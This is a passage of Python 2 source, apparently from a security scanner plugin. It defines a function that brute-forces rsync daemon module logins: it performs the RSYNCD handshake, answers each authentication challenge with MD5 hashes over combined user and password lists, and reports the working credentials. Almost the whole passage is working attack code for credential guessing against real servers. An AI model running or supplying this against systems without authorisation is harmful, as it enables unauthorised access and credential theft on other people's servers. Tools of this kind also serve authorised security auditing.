| 96 | |
| 97 | |
| 98 | def ClientCommand(host, port, cmd): |
| 99 | rsync = {"MagicHeader": "@RSYNCD:", "HeaderVersion": " 30.0"} |
| 100 | payload1 = struct.pack("!8s5ss", rsync["MagicHeader"], rsync["HeaderVersion"], "\n") |
| 101 | payload2 = '%s\n' % cmd |
| 102 | |
| 103 | pass_list = [] |
| 104 | for i in USER_LIST: |
| 105 | pass_list.append((i, i)) |
| 106 | for j in PASS_LIST: |
| 107 | pass_list.append((i, j)) |
| 108 | |
| 109 | for useri, pwdj in pass_list: |
| 110 | try: |
| 111 | user = useri |
| 112 | password = pwdj |
| 113 | # debug("try: %s,%s" %(useri,pwdj)) |
| 114 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| 115 | s.connect((host, port)) |
| 116 | # step1 get version and init |
| 117 | s.send(payload1) |
| 118 | s.recv(1024) # server initialisation |
| 119 | # send cmd and generate the challenge code |
| 120 | s.send(payload2) # send client query |
| 121 | data = s.recv(1024) # data @RSYNCD: AUTHREQD 9moobOy1VMjNAU/D4PB35g |
| 122 | challenge = data[18:-1] # get challenge code |
| 123 | # encrypt and generate the payload3 |
| 124 | md = hashlib.md5() |
| 125 | md.update(password) |
| 126 | md.update(challenge) |
| 127 | auth_send_data = base64.encodestring(md.digest()) |
| 128 | payload3 = "%s %s\n" % (user, auth_send_data[:-3]) |
| 129 | |
| 130 | s.send(payload3) |
| 131 | data3 = s.recv(1024) # @RSYNCD: OK |
| 132 | s.close() |
| 133 | if 'OK' in data3: |
| 134 | if password == '': |
| 135 | return "Module:'%s' User/Password:%s/<empty>" % (cmd, user) |
| 136 | else: |
| 137 | return "Module:'%s' User/Password:%s/%s" % (cmd, user, password) |
| 138 | except Exception, e: |
| 139 | break |
| 140 | return 'brute failed' |